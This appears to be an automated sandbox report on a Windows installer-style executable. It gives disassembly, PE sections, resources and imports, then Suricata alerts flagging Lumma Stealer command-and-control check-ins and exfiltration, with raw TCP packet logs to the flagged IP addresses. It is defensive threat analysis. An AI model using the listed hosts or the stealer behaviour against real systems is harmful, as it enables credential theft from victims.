jmp 00007F2F48ABE459h
call 00007F2F48BB84ACh
mov eax, 00000001h
call 00007F2F48ABEF1Ah
call 00007F2F48ABE89Dh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, 0050177Ch
call 00007F2F48B35C7Ch
push 00000005h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007F2F48AC3DF3h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004D9740h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10d000	0x3840	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x113000	0x7a600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x46ce228	0x21d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x112000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10da80	0x88c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfe084	0xfe200	1ab25608d7f4525587bc172a1863eab2	False	0.4837591843949828	data	6.485261545544607	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x100000	0x1788	0x1800	030d751d7e20e11f863bdb27a950c708	False	0.5203450520833334	data	5.94899155660316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x102000	0x3068	0x3200	2f90c6f68c18651f5b580d5ad2b852e9	False	0.421796875	data	4.334644118113417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x106000	0x6194	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10d000	0x3840	0x3a00	e31e730fc86b9dac8932bd3f92752751	False	0.31041217672413796	data	5.202469592139362	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x111000	0x3c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x112000	0x18	0x200	d6264f4705ad03600aa29f24c89eb799	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"	0.20544562813451883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x113000	0x7a600	0x7a600	4192cb69129de0997f3b212516043200	False	0.6223147025025536	data	7.401668773199618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x113d64	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x113e98	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x113fcc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x114100	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x114234	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x114368	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x11449c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1145d0	0x4e8	Device independent bitmap graphic, 48 x 48 x 4, image size 1152			0.2945859872611465
RT_BITMAP	0x114ab8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.521551724137931
RT_ICON	0x114ba0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.6554054054054054
RT_ICON	0x114cc8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.5577956989247311
RT_ICON	0x114fb0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.46402439024390246
RT_ICON	0x115618	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.5173410404624278
RT_ICON	0x115b80	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.4778880866425993
RT_ICON	0x116428	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.4035181236673774
RT_ICON	0x1172d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6648936170212766
RT_ICON	0x117738	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5410412757973734
RT_ICON	0x1187e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.45570539419087136
RT_ICON	0x11ad88	0xc539	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.999841549644477
RT_STRING	0x1272c4	0xec	data			0.6059322033898306
RT_STRING	0x1273b0	0x250	data			0.47466216216216217
RT_STRING	0x127600	0x28c	data			0.4647239263803681
RT_STRING	0x12788c	0x3e4	data			0.4347389558232932
RT_STRING	0x127c70	0x9c	data			0.717948717948718
RT_STRING	0x127d0c	0xe8	data			0.6293103448275862
RT_STRING	0x127df4	0x468	data			0.3820921985815603
RT_STRING	0x12825c	0x38c	data			0.3898678414096916
RT_STRING	0x1285e8	0x3dc	data			0.39271255060728744
RT_STRING	0x1289c4	0x360	data			0.37037037037037035
RT_STRING	0x128d24	0x40c	data			0.3783783783783784
RT_STRING	0x129130	0x108	data			0.5113636363636364
RT_STRING	0x129238	0xcc	data			0.6029411764705882
RT_STRING	0x129304	0x234	data			0.5070921985815603
RT_STRING	0x129538	0x3c8	data			0.3181818181818182
RT_STRING	0x129900	0x32c	data			0.43349753694581283
RT_STRING	0x129c2c	0x2a0	data			0.41964285714285715
RT_RCDATA	0x129ecc	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x1321b4	0x10	data			1.5
RT_RCDATA	0x1321c4	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x1339c4	0x6b0	data			0.6466121495327103
RT_RCDATA	0x134074	0x5b10	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows	English	United States	0.3255404941660947
RT_RCDATA	0x139b84	0x125	Delphi compiled form 'TMainForm'			0.7508532423208191
RT_RCDATA	0x139cac	0x3a2	Delphi compiled form 'TNewDiskForm'			0.524731182795699
RT_RCDATA	0x13a050	0x320	Delphi compiled form 'TSelectFolderForm'			0.53625
RT_RCDATA	0x13a370	0x300	Delphi compiled form 'TSelectLanguageForm'			0.5703125
RT_RCDATA	0x13a670	0x5d9	Delphi compiled form 'TUninstallProgressForm'			0.4562458249832999
RT_RCDATA	0x13ac4c	0x461	Delphi compiled form 'TUninstSharedFileForm'			0.4335414808206958
RT_RCDATA	0x13b0b0	0x2092	Delphi compiled form 'TWizardForm'			0.2299112497001679
RT_GROUP_CURSOR	0x13d144	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x13d158	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x13d16c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x13d180	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x13d194	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x13d1a8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x13d1bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x13d1d0	0x92	data	English	United States	0.636986301369863
RT_VERSION	0x13d264	0x15c	data	English	United States	0.5689655172413793
RT_MANIFEST	0x13d3c0	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll	AlphaBlend
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll	WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll	lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll	SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
oleaut32.dll	GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll	SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
ole32.dll	CoDisconnectObject
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T18:15:12.247463+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	188.114.97.3	443	TCP
2024-12-30T18:15:12.813965+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49710	188.114.97.3	443	TCP
2024-12-30T18:15:12.813965+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49710	188.114.97.3	443	TCP
2024-12-30T18:15:13.307398+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	188.114.97.3	443	TCP
2024-12-30T18:15:13.779479+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49712	188.114.97.3	443	TCP
2024-12-30T18:15:13.779479+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49712	188.114.97.3	443	TCP
2024-12-30T18:15:14.507520+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49718	188.114.97.3	443	TCP
2024-12-30T18:15:15.751914+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49729	188.114.97.3	443	TCP
2024-12-30T18:15:17.549102+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49741	188.114.97.3	443	TCP
2024-12-30T18:15:19.131010+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49752	188.114.97.3	443	TCP
2024-12-30T18:15:20.167838+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49752	188.114.97.3	443	TCP
2024-12-30T18:15:20.762853+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49760	188.114.97.3	443	TCP
2024-12-30T18:15:22.722388+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49777	188.114.97.3	443	TCP
2024-12-30T18:15:24.851453+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49789	188.114.97.3	443	TCP
2024-12-30T18:15:25.329675+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49789	188.114.97.3	443	TCP
2024-12-30T18:15:26.101812+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49800	185.161.251.21	443	TCP
2024-12-30T18:15:26.888524+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49805	104.21.37.128	443	TCP
2024-12-30T18:15:27.338011+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	104.21.37.128	443	192.168.2.6	49805	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 18:15:11.753556967 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:11.753607988 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:11.753690004 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:11.756786108 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:11.756807089 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.247361898 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.247462988 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.249850988 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.249861002 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.250111103 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.312869072 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.312906981 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.312998056 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.813955069 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.814057112 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.814110041 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.816452026 CET	49710	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.816466093 CET	443	49710	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.823241949 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.823276997 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:12.823359013 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.823683977 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:12.823704004 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.307214975 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.307398081 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.308552027 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.308559895 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.308767080 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.309983969 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.310034990 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.310050964 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779500008 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779546022 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779577971 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779611111 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779613018 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.779637098 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779673100 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.779691935 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779723883 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779736042 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.779745102 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.779781103 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.779788971 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.780041933 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.780085087 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.780092955 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.825279951 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.825289011 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.872162104 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.888438940 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.888495922 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.888526917 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.888549089 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.888549089 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.888561010 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.888611078 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.903731108 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.903790951 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.903865099 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.903879881 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:13.903893948 CET	49712	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:13.903899908 CET	443	49712	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.051215887 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.051279068 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.051368952 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.051707983 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.051722050 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.507399082 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.507519960 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.508812904 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.508822918 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.509079933 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:14.510215044 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.510375977 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:14.510405064 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.101283073 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.101365089 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.101433039 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.101574898 CET	49718	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.101589918 CET	443	49718	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.254688978 CET	49729	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.254746914 CET	443	49729	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.254811049 CET	49729	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.255104065 CET	49729	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.255115032 CET	443	49729	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.751833916 CET	443	49729	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.751914024 CET	49729	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.753015995 CET	49729	443	192.168.2.6	188.114.97.3
Dec 30, 2024 18:15:15.753024101 CET	443	49729	188.114.97.3	192.168.2.6
Dec 30, 2024 18:15:15.753251076 CET	443	49729	188.114.97.3	192.168.2.6
